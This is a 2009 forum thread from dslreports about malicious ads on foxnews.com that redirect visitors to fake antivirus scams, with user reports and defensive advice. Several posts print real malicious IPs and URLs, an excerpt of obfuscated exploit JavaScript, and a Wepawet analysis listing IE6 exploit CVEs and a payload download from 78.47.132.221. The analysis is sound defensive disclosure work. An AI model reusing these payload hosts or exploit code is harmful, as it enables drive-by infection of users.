 CajunTekInsane Cajun
Premium Member
join:2003-08-08
Arlington, TX
3 recommendations |
to buttoni
Re: foxnews.com infected?said by buttoni:So now that you guys have proven something's up with Foxnews.com who's gonna contact Foxnews.com so their tech folks can clean it up?   I did, and I also reported it to stopbadware.org as well... Hopefully it'll be cleaned up by now. |
|
1 edit
1 recommendation |
I can confirm there is an infection of the site.
The site is infected through ads and it is these that cause the problem. There can be numerous ads involved, but I have singled out one for sure. |
|
 fatnesssubtle
join:2000-11-17
fishing |
to CajunTek
said by CajunTek:said by buttoni:So now that you guys have proven something's up with Foxnews.com who's gonna contact Foxnews.com so their tech folks can clean it up? I did, and I also reported it to stopbadware.org as well... Hopefully it'll be cleaned up by now. Thank you. |
|
 buttoni
Premium Member
join:2005-08-16
Temple, TX |
to moonpuppy
Great, CajunTek. Glad someone took care of that little matter. Thanks. |
|
1 recommendation |
With the deepest respect for dslreports.com. I've got no problems with not telling who I am, or what connection I have with the reporting. - I work with and am connected with stopbadware.org/www.consumerwebwatch.org - through one of their mutual sites. - We're not here to steal your users, but rather to offer our help when need be.
dslreports has always been one of the best resources of the web, and I hope it stays that way.
That said - I'm working to get to the bottom of this, and have identified the possible advertising partner involved. However, I have not received any response from foxnews.com about the issue. I will be investigating this a little more in depth later and give you all a full disclosure of what has been found.
dslreports.com is the cause for the stopbadware community becoming interested in this issue.
Cometcom1 |
|
 RoboticsSee You On The Dark Side
Premium Member
join:2003-10-23
Louisa, VA |
Robotics
Premium Member
2009-Apr-18 4:32 pm
I'm sure we all have our fingers crossed this can be corrected/caught in good time. Thanks for your all's help, and nice to met you |
|
| |
to moonpuppy
I have now managed to obtain a proxy log and a tcp dump of the infection taking place. This should enable us to say what exactly is happening.
I still haven't heard from foxnews.com, if any of you have them on the line, please let them know that I have some of the information required to fix the issue.
Cometcom1 |
|
fatnesssubtle
join:2000-11-17
fishing
1 recommendation |
to moonpuppy
|
|
moonpuppy (banned)
join:2000-08-21
Glen Burnie, MD |
moonpuppy (banned)
Member
2009-Apr-18 6:03 pm
All this fuss over my laptop almost getting infected.  |
|
| |
to moonpuppy
It seems that the infection emanating from foxnews.com has stopped. I haven't been able to verify any malware from the site today.
If anyone is still experiencing this, please let us know either here at dslreports or through the link fatness provided. (thanks fatness)
I still haven't heard from foxnews but perhaps they can enlighten us later with their response.
Cometcom1 |
|
| |
foxinfected to moonpuppy
Anon
2009-Apr-19 2:04 pm
to moonpuppy
Still infecting... I was just hit.. Its been going on for several days. |
|
 Its a SecretPlease speak into the microphone
Premium Member
join:2008-02-23
Da wet coast |
to Cometcom1
said by Cometcom1:I still haven't heard from foxnews but perhaps they can enlighten us later with their response. I can't imagine Fox will admit any cupability in this. The odds are too great that they'd be sued. |
|
 NetFixerFrom My Cold Dead Hands
Premium Member
join:2004-06-24
The Boro
Pace 5268AC
TRENDnet TEW-829DRU
|
NetFixer
Premium Member
2009-Apr-19 2:10 pm
said by Its a Secret:said by Cometcom1:I still haven't heard from foxnews but perhaps they can enlighten us later with their response. I can't imagine Fox will admit any cupability in this. The odds are too great that they'd be sued. The most that will be said (if anything) is the standard corporate response: " We did not do it. It is possible that a subcontractor may have done something, but we are not aware of any wrongdoing and we are not responsible for any actions taken by a subcontractor". |
|
| |
to moonpuppy
Durn (Excuse my french). I had hoped they'd done something to fix it.
Question. Is there any ads that fail to show up for any of you. On my view, I have two ads (denoted by ADVERTISING) on the right vertical bar. Often these are totally blank - If you don't experience these blank spots, then I have a hunch the malware is originating from that location. There's obviously some intelligence involved in the distribution. |
|
|
 Doctor FourMy other vehicle is a TARDIS
Premium Member
join:2000-09-05
Dallas, TX |
to MGD
I'm not surprised in the least to see DIRECTI's involvement in this. They have been implicated in a huge number of rogue security software scams.
They continually allow the cybercriminals behind these fraudware sites to register new domains, all the while claiming they are taking action against them by shutting down existing ones. |
|
| |
to Cometcom1
said by Cometcom1:It seems that the infection emanating from foxnews.com has stopped. I haven't been able to verify any malware from the site today. ... .. Be advised that there is a high probability that the advertiser serving up this malware may be rotating geographic regional adds, either based on the visitors IP, or existing cookies. The exposure may rotate by region depending on the add criteria, and not everyone will "see" the same rotation. I saw earlier reports from several days prior to my original post listing the infection, that pronounced foxnews "clean". I would be hesitant to assume from the absence of the malware over any time period that the issue has been resolved, without some confirmation from the offending advertiser. I suspect that this is a well organized infection vector that is designed for variable regional exposure, in order to preserve the operation and obfuscate the origin. While I understand your reluctance to publish your analysis data and identify the advertising source, I am interested in a relevant issue. Have you determined if the source is a direct add link, or if it appears to be a "legit" add link compromised by some form of injection?. The reason I ask, is that it is already known and verified that some of the criminals that are pumping this malware are using paid sponsor adds to promote the infection. A previous fake antivirus thread identified a small time operative and affiliate recruiter residing in Moscow, Russia with the alias "Cactus" was using paid sponsor adds on Yahoo and others to promote the malware to consumers in this thread: » [Scam] Real-av.org - Antivirus2009 malware takeover and this specific post. » Re: [Scam] Real-av.org - Antivirus2009 malware takeoverAn unacceptable weak link in the internet advertising industry, which has been discussed on numerous occasions in that forum, is the lack of vetting during the submission process. While advertisers may review keywords and relevant links for acceptability, they routinely do not take simple steps to validate the submitter against the form of payment used. I have recorded and documented cyber criminals using stolen card data to successfully open and use Google adsense accounts. The success was dependent on an approval of the charge submitted against the stolen card. I hope that you will publish the reference data for review even if no response is forthcoming. Even if the data is inconclusive and lacks confirmation from the source, it should be published for others to evaluate. This vector is not a one time event, neither do I believe that foxnews.com is the only site that is subject to this issue. Two of the many entities that are responsible for this malware becoming an epidemic, are the support services repeatedly obtained from the global financial card processing and banking system, and the services of the internet advertising industry. Nether one, but especially the banking system are doing reasonable due diligence wit respect to this criminal activity. MGD |
|
| |
I concur with your assessment MGD.
I've seen this happen here in my country on a local scale as well. "Our" local infection was hosted in China, but spread out on all Danish news sites.
This community has continued to report this infection even after I thought it was over.
Foxnews is still infected - unfortunately. |
|
| |
to moonpuppy
I went to foxnews.com today and the browser shut down automatically. I then got a message saying my computer was infected.
I closed the dialog box and it brought me to a website designed to look like a virus scan was running on my computer. I closed down the browser.
Eset nod32 did not detect anything but it's probably because I did not allow anything to be downloaded to my system. |
|
 La LunaFly With The Angels My Beloved Son Chris
Premium Member
join:2001-07-12
New Port Richey, FL |
La Luna
Premium Member
2009-Apr-19 7:15 pm
said by grifty:I went to foxnews.com today and the browser shut down automatically. I then got a message saying my computer was infected. I closed the dialog box and it brought me to a website designed to look like a virus scan was running on my computer. I closed down the browser. Eset nod32 did not detect anything but it's probably because I did not allow anything to be downloaded to my system. You might want to run some tools to make sure: » Re: foxnews.com infected? |
|
| |
to moonpuppy
Hi,
I have been on foxnews.com twice this weekend, and both times I saw suspicious behavior. One time Firefox blocked access to a site called antimalware-scannerv2.com. However today Firefox did not block access to a site called onlinevirusbusterv2.com. After I started reading an article on foxnews.com for a few seconds, my browser was redirected to a fake av site that "performed" a bogus virus scan on my machine. I fear most people fall for this stuff and end up installing the trojan. At this point, I feel it is unsafe to go to foxnews.com. |
|
 EGeezer
Premium Member
join:2002-08-04
Midwest
3 edits |
to moonpuppy
Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. It takes care of the malware issue.
|
|
La LunaFly With The Angels My Beloved Son Chris
Premium Member
join:2001-07-12
New Port Richey, FL
1 recommendation |
La Luna
Premium Member
2009-Apr-19 10:28 pm
said by EGeezer:Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. I was just going to ask that question, does AdBlock and/or NoScript prevent this malware? Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working. I also use a simple Firefox add on called QuickJava that allows me to block both java and java scripting on the fly as I see fit on a site per site basis, although I'm not sure it would work with this issue as there are multiple domains involved, not just the home domain. |
|
EGeezer
Premium Member
join:2002-08-04
Midwest |
EGeezer
Premium Member
2009-Apr-19 10:31 pm
said by La Luna:... Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working. I run both. I agree, it's a pain until you learn where the media is usually stored. thanks for the quickjava mention - I'll have to try that. |
|
1 edit
3 recommendations |
to Cometcom1
I can confirm what other recent posters have experienced today. I now categorize foxnews.com as infested. Remember that a user need only visit a page at foxnews.com to trigger the malware popup. It is not the result of clicking on any add. While on this page at 16:57 EST » www.foxnews.com/story/0, ··· ,00.html the following was generated: quote:
19.04.2009 16:57:21 Network Shield: blocked access to malicious site 78.47.132.222/a12/index.php?url=http://truconv.com/?a=125&s=4a12 [ C:\Program Files\Internet Explorer\IEXPLORE.EXE ( 3388 ) ]
Allowing the process to proceed generated this: 
Then the page hijacking scan: 
A download process of vsm_free_setup.exe also began from toppromooffer.com
While there are many who classify these fake AV programs as "Scareware", I disagree. While the the first phase of the process will involve charging a victim's card ~ $70, followed by numerous other charges in the following days and weeks. I have yet to see an infected system that did not have subsequent installs of key loggers, and back door trojans that turned it into a bot and enabled remote access. That observation is supported by the repeated analysis of these payload installs. The downloaded file vsm_free_setup.exe was already in VrusTotal's database from a recent submit, and a fresh analysis of this file generated: » www.virustotal.com/anali ··· 95f80e26 However if you review the related ThreatExpert analysis: » www.threatexpert.com/rep ··· 47a88f8fTake note of the following excerpts: ------------------------------ Analysis of the file resources indicate the following possible countries of origin: Russian Federation Ukraine ------------------------------ Possible Security RiskAttention! The following threat categories were identified: •A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.) •A program that downloads files to the local computer that may represent security risk ------------------------------ It is indeed disingenuous to only classify these as "Scareware", that undermines the severity of the crime. The download location also hosts a benign page for the malware: Many of the same locations as were listed in the earlier post are showing up once again. AS24940 HETZNER is a repeated cesspool for this genre of virus infections: 
Added excerpt for emphasis: quote:
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 85 site(s), including, for example, toppromooffer.com/, bestantimalwarelivescanner.com/, bonuspromooffer.com/, that infected 5596 other site(s), including, for example, portalby.net/, noreastcycling.com/, asiaspa.ie/.
Yes, that is: We found 85 site(s), including, for example, toppromooffer.com that infected 5,596 other site(s Some more observations to follow. MGD Edit= Added text |
|
mysec
Premium Member
join:2005-11-29
1 edit
2 recommendations |
mysec
Premium Member
2009-Apr-20 3:05 am
Thanks for the information! The Fox News link you gave must be fixed - it didn't redirect anywhere; I used your malware links manually. I get different results, depending on the browser. said by MGD:A download process of vsm_free_setup.exe also began from toppromooffer.com Using Opera, all that happens is the display of a Prompt to Download, which maybe is what you meant: 
The victim still has to initiate the download. BTW - the exploit requires JavaScript to be enabled: script language="javascript" src="../../etc/config.js"></script>
script language="javascript">
//CONFIG.AGRESSION.EX.VAL = 5;
/script>
SCRIPT src="img/jquery.js"
type=text/javascript></SCRIPT>
SCRIPT src="img/jquery-init.js"
type=text/javascript></SCRIPT>
SCRIPT src="img/flist.js"
type=text/javascript></SCRIPT>
<SCRIPT
Without these files, nothing happens. To test, I disabled JavaScript in Opera and got a blank page. Using IE6 with 78.47.132.... that you gave, the browser locked up and then an alert to a remote code execution exploit: 
The Page Code has this (excerpt): <html <body> script language="javascript">try { function
MxKrzZOSqYbxzW(IgKhV){var tOdCnZgx="",beVpC,PTfki,
yemjblcpAo,yAFgXcIB,WGmxZNPUc,zItDdLHBVJ,kjqrOKMSP,IdVpm,
sANfyVmBOC;var gWyitpZ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy
z0123456789+/=";var aRzhby="";for(IdVpm=0;IdVpm<IgKhV.
length;){yAFgXcIB=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
WGmxZNPUc=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
sANfyVmBOC=MxKrzZOSqYbxzW;zItDdLHBVJ=gWyitpZ.indexOf(IgKhV.
charAt(IdVpm++));kjqrOKMSP=gWyitpZ.indexOf(IgKhV.
charAt(IdVpm++));beVpC=(yAFgXcIB<<2)+(WGmxZNPUc>>4);
PTfki=((WGmxZNPUc&15)<<4)+(zItDdLHBVJ>>2);
With some help from Wepawet: Analysis report for index2[1].htm
Detector Result: malicious
Exploits
1. DirectAnimation PathControlHeap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.
PathControl) COM object (daxctle.ocx)
for Internet Explorer 6.0 CVE-2006-4777
2. Office Snapshot ViewerThe Microsoft Office Snapshot Viewer
ActiveX control allows remote attackers to download
arbitrary files to a client machineCVE-2008-2463
3. MDACArbitrary file download via the Microsoft Data Access
Components (MDAC)CVE-2006-0003
4. WebViewFolder integer overflow via the setSlice method
CVE-2006-3730
Deobfuscation results
Methods
GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
GET http://78.47.132.221/a12/aff_12.exe?
Malware
aff_12.exe?u=i_6_0&spl=11MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
The 3rd exploit (aka MS06-014) is the one I was served up. The clue is: GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
Special Folder 2 is code for the Temp folder and in the alert you can see that this file was not found because aff_12 was blocked from downloading and renaming to w32NOFJCyliz5mm5R.exe According to the analysis, all exploits downloaded the same payload. VirusTotal Result: 2/40 » www.virustotal.com/anali ··· a2f50448It is rather common today that a malware site determines the browser and serves up exploits accordingly. All of these are IE6 exploits which would have no effect on other browsers. This is the 3rd exploit I've seen recently where the exact same thing happens: IE6 gets served a batch of exploits looking for an unpatched vulnerability, Opera gets something else. This shows a level of sophistication and efficiency on the part of the malware community these days. I recently downloaded Firefox to test sites. This is what occurred with Javascript enabled in Options: 
Even clicking "Ignore" would not load the page. It took me awhile to find the security setting. Trying again, I'm served up a PDF exploit. From the code analysis: Network Activity
Requests
URL: http://78.47.132.221/a12/pdf.php?u=i_6_0
But it requires the Acobe Acrobat Javascript plugin which I've removed: 
Different browser, different exploit. And that might change at any time!
And so it goes...
Edit: added code excerpt
----
rich
|
|
| |
to moonpuppy
Just to confirm. Still being targeted here as well. Fake antivirus type redirection.
As I expected, there's likely a reinfection timer that checks when an IP was last infected to avoid reinfection over at least 24 hours. - My tests seem to indicate that this is not done with cookies. |
|
Sentinel
Premium Member
join:2001-02-07
Florida |
to moonpuppy
I still have no problems on FoxNews.com. I am using Firefox with NoScript and FlashBlock and I use a hosts file to block ads as well. |
|
| |
to moonpuppy
Nothing against foxnews - it's their advertising that is acting up and spreading the malware. Likely without them even realizing this is going on.
I've now established contact with foxnews and they are looking into this very seriously.
Cometcom1 |
|
| |
MR Opus IT to moonpuppy
Anon
2009-Apr-20 9:48 am
to moonpuppy
I left my Home Laptop on over night on Foxnews.com (Nothing Else open) and my Laptop Antivirus (Symantec) Picked Up Bloodhound.Exploit. Also, a user in my office was slammed with 3 different maleware issues (She claimed came from Foxnews) and after i cleaned them all I installed the latest Symantec EndPoint Protection and went back to Foxnews.com and sure enough it picked up 3 different maleware trojans. It stopped all three and I then removed any IE7 Add-Ons and went back to the site and nothing happened. There is something about that site. |
|
fatnesssubtle
join:2000-11-17
fishing
3 recommendations |
to moonpuppy
Maybe this will provide more of a push for Fox News to deal with this problem: » FoxNews.com Serving Up Infected Ads? [212] comments |
|
